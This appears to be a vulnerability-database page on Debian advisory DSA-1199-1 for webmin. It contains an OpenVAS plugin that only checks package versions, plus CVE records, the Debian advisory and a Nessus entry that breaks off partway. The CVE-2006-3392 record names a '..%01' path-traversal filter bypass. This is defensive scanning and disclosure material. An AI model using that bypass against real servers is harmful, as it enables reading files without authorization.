ID OPENVAS:57540 Type openvas Reporter Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com Modified 2017-07-07T00:00:00
Description
The remote host is missing an update to webmin
announced via advisory DSA 1199-1.
Several vulnerabilities have been identified in webmin, a web-based
administration toolkit.
CVE-2005-3912
A format string vulnerability in miniserv.pl could allow an
attacker to cause a denial of service by crashing the
application or exhausting system resources, and could
potentially allow arbitrary code execution.
CVE-2006-3392
Improper input sanitization in miniserv.pl could allow an
attacker to read arbitrary files on the webmin host by providing
a specially crafted URL path to the miniserv http server.
CVE-2006-4542
Improper handling of null characters in URLs in miniserv.pl
could allow an attacker to conduct cross-site scripting attacks,
read CGI program source code, list local directories, and
potentially execute arbirary code.
# OpenVAS Vulnerability Test
# $Id: deb_1199_1.nasl 6616 2017-07-07 12:10:49Z cfischer $
# Description: Auto-generated from advisory DSA 1199-1
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largerly excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
tag_solution = "For the stable distribution (sarge), these problems have been fixed in
version 1.180-3sarge1
Webmin is not included in unstable (sid) or testing (etch), so these
problems are not present.
We recommend that you upgrade your webmin (1.180-3sarge1) package.
https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201199-1";
tag_summary = "The remote host is missing an update to webmin
announced via advisory DSA 1199-1.
Several vulnerabilities have been identified in webmin, a web-based
administration toolkit.
CVE-2005-3912
A format string vulnerability in miniserv.pl could allow an
attacker to cause a denial of service by crashing the
application or exhausting system resources, and could
potentially allow arbitrary code execution.
CVE-2006-3392
Improper input sanitization in miniserv.pl could allow an
attacker to read arbitrary files on the webmin host by providing
a specially crafted URL path to the miniserv http server.
CVE-2006-4542
Improper handling of null characters in URLs in miniserv.pl
could allow an attacker to conduct cross-site scripting attacks,
read CGI program source code, list local directories, and
potentially execute arbirary code.";
if(description)
{
script_id(57540);
script_version("$Revision: 6616 $");
script_tag(name:"last_modification", value:"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $");
script_tag(name:"creation_date", value:"2008-01-17 23:13:11 +0100 (Thu, 17 Jan 2008)");
script_cve_id("CVE-2005-3912", "CVE-2006-3392", "CVE-2006-4542");
script_bugtraq_id(15629,18744,19820);
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_name("Debian Security Advisory DSA 1199-1 (webmin)");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com");
script_family("Debian Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/debian_linux", "ssh/login/packages");
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
#
# The script code starts here
#
include("pkg-lib-deb.inc");
res = "";
report = "";
if ((res = isdpkgvuln(pkg:"webmin-core", ver:"1.180-3sarge1", rls:"DEB3.1")) != NULL) {
report += res;
}
if ((res = isdpkgvuln(pkg:"webmin", ver:"1.180-3sarge1", rls:"DEB3.1")) != NULL) {
report += res;
}
if (report != "") {
security_message(data:report);
} else if (__pkg_match) {
exit(99); # Not vulnerable.
}
{"id": "OPENVAS:57540", "type": "openvas", "bulletinFamily": "scanner", "title": "Debian Security Advisory DSA 1199-1 (webmin)", "description": "The remote host is missing an update to webmin\nannounced via advisory DSA 1199-1.\n\nSeveral vulnerabilities have been identified in webmin, a web-based\nadministration toolkit.\n\nCVE-2005-3912\nA format string vulnerability in miniserv.pl could allow an\nattacker to cause a denial of service by crashing the\napplication or exhausting system resources, and could\npotentially allow arbitrary code execution.\n\nCVE-2006-3392\nImproper input sanitization in miniserv.pl could allow an\nattacker to read arbitrary files on the webmin host by providing\na specially crafted URL path to the miniserv http server.\n\nCVE-2006-4542\nImproper handling of null characters in URLs in miniserv.pl\ncould allow an attacker to conduct cross-site scripting attacks,\nread CGI program source code, list local directories, and\npotentially execute arbirary code.", "published": "2008-01-17T00:00:00", "modified": "2017-07-07T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=57540", "reporter": "Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2006-3392", "CVE-2005-3912", "CVE-2006-4542"], "lastseen": "2017-07-24T12:50:13", "viewCount": 12, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2017-07-24T12:50:13", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3912", "CVE-2006-4542", "CVE-2006-3392"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-200608-11.NASL", "MANDRAKE_MDKSA-2006-170.NASL", "DEBIAN_DSA-1199.NASL", "WEBMIN_MINISERV_USERNAME_FORMAT_STRING.NASL", "USERMIN_1220_INFO_DISCLOSURE.NASL", "USERMIN_1226_INFO_DISCLOSURE.NASL", "GENTOO_GLSA-200512-02.NASL", "WEBMIN_1_250.NASL", "WEBMIN_1296.NASL", "MANDRAKE_MDKSA-2005-223.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1199-1:7FD00"]}, {"type": "gentoo", "idList": ["GLSA-200608-11", "GLSA-200512-02"]}, {"type": "openvas", "idList": ["OPENVAS:57861", "OPENVAS:55975", "OPENVAS:57067", "OPENVAS:56271"]}, {"type": "osvdb", "idList": ["OSVDB:26772", "OSVDB:28337", "OSVDB:28338", "OSVDB:21222"]}, {"type": "canvas", "idList": ["WEBMIN"]}, {"type": "exploitdb", "idList": ["EDB-ID:1997"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2006-3392.NSE"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/WEBMIN/FILE_DISCLOSURE"]}, {"type": "cert", "idList": ["VU:999601"]}, {"type": "freebsd", "idList": ["BB33981A-7AC6-11DA-BF72-00123F589060"]}, {"type": "seebug", "idList": ["SSV:630"]}, {"type": "kitploit", "idList": ["KITPLOIT:8672599587089685905", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973"]}], "modified": "2017-07-24T12:50:13", "rev": 2}, "vulnersScore": 6.8}, "pluginID": "57540", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1199_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1199-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge), these problems have been fixed in\nversion 1.180-3sarge1\n\nWebmin is not included in unstable (sid) or testing (etch), so these\nproblems are not present.\n\nWe recommend that you upgrade your webmin (1.180-3sarge1) package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201199-1\";\ntag_summary = \"The remote host is missing an update to webmin\nannounced via advisory DSA 1199-1.\n\nSeveral vulnerabilities have been identified in webmin, a web-based\nadministration toolkit.\n\nCVE-2005-3912\nA format string vulnerability in miniserv.pl could allow an\nattacker to cause a denial of service by crashing the\napplication or exhausting system resources, and could\npotentially allow arbitrary code execution.\n\nCVE-2006-3392\nImproper input sanitization in miniserv.pl could allow an\nattacker to read arbitrary files on the webmin host by providing\na specially crafted URL path to the miniserv http server.\n\nCVE-2006-4542\nImproper handling of null characters in URLs in miniserv.pl\ncould allow an attacker to conduct cross-site scripting attacks,\nread CGI program source code, list local directories, and\npotentially execute arbirary code.\";\n\n\nif(description)\n{\n script_id(57540);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:13:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-3912\", \"CVE-2006-3392\", \"CVE-2006-4542\");\n script_bugtraq_id(15629,18744,19820);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1199-1 (webmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"webmin-core\", ver:\"1.180-3sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"webmin\", ver:\"1.180-3sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "Debian Local Security Checks"}
{"cve": [{"lastseen": "2020-12-09T19:22:22", "description": "Format string vulnerability in miniserv.pl Perl web server in Webmin before 1.250 and Usermin before 1.180, with syslog logging enabled, allows remote attackers to cause a denial of service (crash or memory consumption) and possibly execute arbitrary code via format string specifiers in the username parameter to the login form, which is ultimately used in a syslog call. NOTE: the code execution might be associated with an issue in Perl.", "edition": 5, "cvss3": {}, "published": "2005-11-30T11:03:00", "title": "CVE-2005-3912", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-3912"], "modified": "2019-04-03T16:24:00", "cpe": ["cpe:/o:debian:debian_linux:3.1"], "id": "CVE-2005-3912", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3912", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:23:47", "description": "Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files, as demonstrated using \"..%01\" sequences, which bypass the removal of \"../\" sequences before bytes such as \"%01\" are removed from the filename. NOTE: This is a different issue than CVE-2006-3274.", "edition": 5, "cvss3": {}, "published": "2006-07-06T20:05:00", "title": "CVE-2006-3392", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392"], "modified": "2018-10-18T16:47:00", "cpe": ["cpe:/a:webmin:webmin:1.2.80", "cpe:/a:usermin:usermin:1.210"], "id": "CVE-2006-3392", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3392", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:usermin:usermin:1.210:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.2.80:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:23:48", "description": "Webmin before 1.296 and Usermin before 1.226 do not properly handle a URL with a null (\"%00\") character, which allows remote attackers to conduct cross-site scripting (XSS), read CGI program source code, list directories, and possibly execute programs.\nThis vulnerability is addressed in the following product releases:\r\nWebmin, Webmin, 1.296\r\nUsermin, Usermin, 1.226", "edition": 5, "cvss3": {}, "published": "2006-09-05T23:04:00", "title": "CVE-2006-4542", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4542"], "modified": "2017-07-20T01:33:00", "cpe": ["cpe:/a:webmin:webmin:1.0.10", "cpe:/a:webmin:webmin:0.95", "cpe:/a:usermin:usermin:1.100", "cpe:/a:webmin:webmin:0.42", "cpe:/a:webmin:webmin:0.80", "cpe:/a:webmin:webmin:0.3", "cpe:/a:webmin:webmin:1.1.00", "cpe:/a:webmin:webmin:0.7", "cpe:/a:usermin:usermin:0.97", "cpe:/a:usermin:usermin:0.8", "cpe:/a:usermin:usermin:1.010", "cpe:/a:webmin:webmin:0.6", "cpe:/a:webmin:webmin:1.0.80", "cpe:/a:usermin:usermin:1.110", "cpe:/a:usermin:usermin:0.4", "cpe:/a:webmin:webmin:0.85", "cpe:/a:webmin:webmin:0.78", "cpe:/a:webmin:webmin:0.90", "cpe:/a:usermin:usermin:1.000", "cpe:/a:webmin:webmin:1.0.20", "cpe:/a:usermin:usermin:0.6", "cpe:/a:usermin:usermin:0.99", "cpe:/a:webmin:webmin:0.97", "cpe:/a:webmin:webmin:1.1.40", "cpe:/a:webmin:webmin:0.99", "cpe:/a:webmin:webmin:1.0.70", "cpe:/a:webmin:webmin:1.2.50", "cpe:/a:usermin:usermin:1.030", "cpe:/a:webmin:webmin:0.84", "cpe:/a:webmin:webmin:1.0.90", "cpe:/a:webmin:webmin:0.88", "cpe:/a:webmin:webmin:0.4", "cpe:/a:usermin:usermin:1.020", "cpe:/a:webmin:webmin:0.22", "cpe:/a:usermin:usermin:1.080", "cpe:/a:webmin:webmin:1.1.21", "cpe:/a:usermin:usermin:0.91", "cpe:/a:webmin:webmin:0.5", "cpe:/a:webmin:webmin:0.31", "cpe:/a:webmin:webmin:1.0.50", "cpe:/a:webmin:webmin:1.2.20", "cpe:/a:usermin:usermin:0.93", "cpe:/a:webmin:webmin:0.94", "cpe:/a:usermin:usermin:1.090", "cpe:/a:webmin:webmin:1.2.70", "cpe:/a:webmin:webmin:1.1.20", "cpe:/a:webmin:webmin:0.98", "cpe:/a:usermin:usermin:0.94", "cpe:/a:usermin:usermin:0.95", "cpe:/a:webmin:webmin:0.2", "cpe:/a:webmin:webmin:0.21", "cpe:/a:webmin:webmin:0.77", "cpe:/a:usermin:usermin:1.120", "cpe:/a:webmin:webmin:0.1", "cpe:/a:webmin:webmin:1.0.30", "cpe:/a:usermin:usermin:0.92", "cpe:/a:usermin:usermin:0.9", "cpe:/a:webmin:webmin:1.2.80", "cpe:/a:webmin:webmin:1.1.10", "cpe:/a:usermin:usermin:1.060", "cpe:/a:usermin:usermin:1.130", "cpe:/a:webmin:webmin:0.76", "cpe:/a:usermin:usermin:1.051", "cpe:/a:webmin:webmin:1.2.60", "cpe:/a:usermin:usermin:1.150", "cpe:/a:usermin:usermin:0.5", "cpe:/a:webmin:webmin:1.0.51", "cpe:/a:webmin:webmin:1.0.60", "cpe:/a:usermin:usermin:1.220", "cpe:/a:webmin:webmin:0.92", "cpe:/a:webmin:webmin:1.1.50", "cpe:/a:webmin:webmin:1.2.40", "cpe:/a:webmin:webmin:0.92.1", "cpe:/a:webmin:webmin:1.0.00", "cpe:/a:usermin:usermin:0.96", "cpe:/a:webmin:webmin:0.51", "cpe:/a:usermin:usermin:1.070", "cpe:/a:usermin:usermin:1.140", "cpe:/a:webmin:webmin:0.93", "cpe:/a:webmin:webmin:0.91", "cpe:/a:webmin:webmin:1.0.40", "cpe:/a:webmin:webmin:1.2.30", "cpe:/a:usermin:usermin:0.98", "cpe:/a:webmin:webmin:1.1.30", "cpe:/a:usermin:usermin:0.7", "cpe:/a:webmin:webmin:0.83", "cpe:/a:webmin:webmin:1.2.90", "cpe:/a:usermin:usermin:1.210", "cpe:/a:webmin:webmin:0.79", "cpe:/a:webmin:webmin:0.41", "cpe:/a:webmin:webmin:0.96", "cpe:/a:usermin:usermin:1.040"], "id": "CVE-2006-4542", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4542", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:webmin:webmin:1.0.90:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.84:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.2.30:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.1.30:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.060:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:0.4:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.2.90:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.130:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.31:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.000:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:0.7:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.4:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.110:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.0.80:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:0.6:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:0.94:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.0.51:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.220:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.78:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.6:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.2:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.2.70:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.90:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.1:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.0.60:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.080:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.79:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.210:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:0.93:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.99:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.030:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.21:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.85:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.80:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.98:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.94:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.92.1:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.88:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.040:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.3:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.0.70:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.100:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.1.40:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.150:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.020:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.140:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.97:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.77:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:0.97:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.090:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.7:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.2.50:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.2.40:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.83:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.120:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.070:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.010:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.42:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.1.50:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.2.60:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.41:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:0.98:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:0.9:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.92:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:1.051:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.0.40:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.1.21:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.0.00:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.1.00:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.2.20:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.93:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.2.80:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:0.92:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.51:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:1.0.50:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.76:*:*:*:*:*:*:*", "cpe:2.3:a:webmin:webmin:0.22:*:*:*:*:*:*:*", "cpe:2.3:a:usermin:usermin:0.99:*:*:*:*:*:*:*"]}], "debian": [{"lastseen": "2020-11-11T13:16:48", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3392", "CVE-2005-3912", "CVE-2006-4542"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1199-1 security@debian.org\nhttp://www.debian.org/security/ Noah Meyerhans\nOctober 23, 2006\n- ------------------------------------------------------------------------\n\nPackage : webmin\nVulnerability : multiple\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2005-3912 CVE-2006-3392 CVE-2006-4542\nBugTraq ID : 15629 18744 19820\nDebian Bug : 341394 381537 391284\n\nSeveral vulnerabilities have been identified in webmin, a web-based\nadministration toolkit.\n\nCVE-2005-3912\n\tA format string vulnerability in miniserv.pl could allow an\n\tattacker to cause a denial of service by crashing the\n\tapplication or exhausting system resources, and could\n\tpotentially allow arbitrary code execution.\n\nCVE-2006-3392\n\tImproper input sanitization in miniserv.pl could allow an\n\tattacker to read arbitrary files on the webmin host by providing\n\ta specially crafted URL path to the miniserv http server.\n\nCVE-2006-4542\n\tImproper handling of null characters in URLs in miniserv.pl\n\tcould allow an attacker to conduct cross-site scripting attacks,\n\tread CGI program source code, list local directories, and\n\tpotentially execute arbirary code.\n\nFor the stable distribution (sarge), these problems have been fixed in\nversion 1.180-3sarge1\n\nWebmin is not included in unstable (sid) or testing (etch), so these\nproblems are not present.\n\nWe recommend that you upgrade your webmin (1.180-3sarge1) package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian 3.1 (stable)\n- -------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/w/webmin/webmin_1.180-3sarge1.dsc\n Size/MD5 checksum: 703 5e723deaccb3db60794e0cb385666992\n http://security.debian.org/pool/updates/main/w/webmin/webmin_1.180.orig.tar.gz\n Size/MD5 checksum: 2261496 ff19d5500955302455e517cb2942c9d0\n http://security.debian.org/pool/updates/main/w/webmin/webmin_1.180-3sarge1.diff.gz\n Size/MD5 checksum: 31458 f8fe363e7ccd8fe4072d84cd86a3510e\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/w/webmin/webmin-core_1.180-3sarge1_all.deb\n Size/MD5 checksum: 1121200 8fa7064325ded44e7f8dbd226b81d9dd\n http://security.debian.org/pool/updates/main/w/webmin/webmin_1.180-3sarge1_all.deb\n Size/MD5 checksum: 1097552 34d96210d581dde8ffea7be82e0897f4\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2006-10-24T00:00:00", "published": "2006-10-24T00:00:00", "id": "DEBIAN:DSA-1199-1:7FD00", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00295.html", "title": "[SECURITY] [DSA 1199-1] New webmin packages fix input validation problems", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-06T09:44:43", "description": "Several vulnerabilities have been identified in webmin, a web-based\nadministration toolkit. The Common Vulnerabilities and Exposures\nproject identifies the following vulnerabilities :\n\n - CVE-2005-3912\n A format string vulnerability in miniserv.pl could allow\n an attacker to cause a denial of service by crashing the\n application or exhausting system resources, and could\n potentially allow arbitrary code execution.\n\n - CVE-2006-3392\n Improper input sanitization in miniserv.pl could allow\n an attacker to read arbitrary files on the webmin host\n by providing a specially crafted URL path to the\n miniserv http server.\n\n - CVE-2006-4542\n Improper handling of null characters in URLs in\n miniserv.pl could allow an attacker to conduct\n cross-site scripting attacks, read CGI program source\n code, list local directories, and 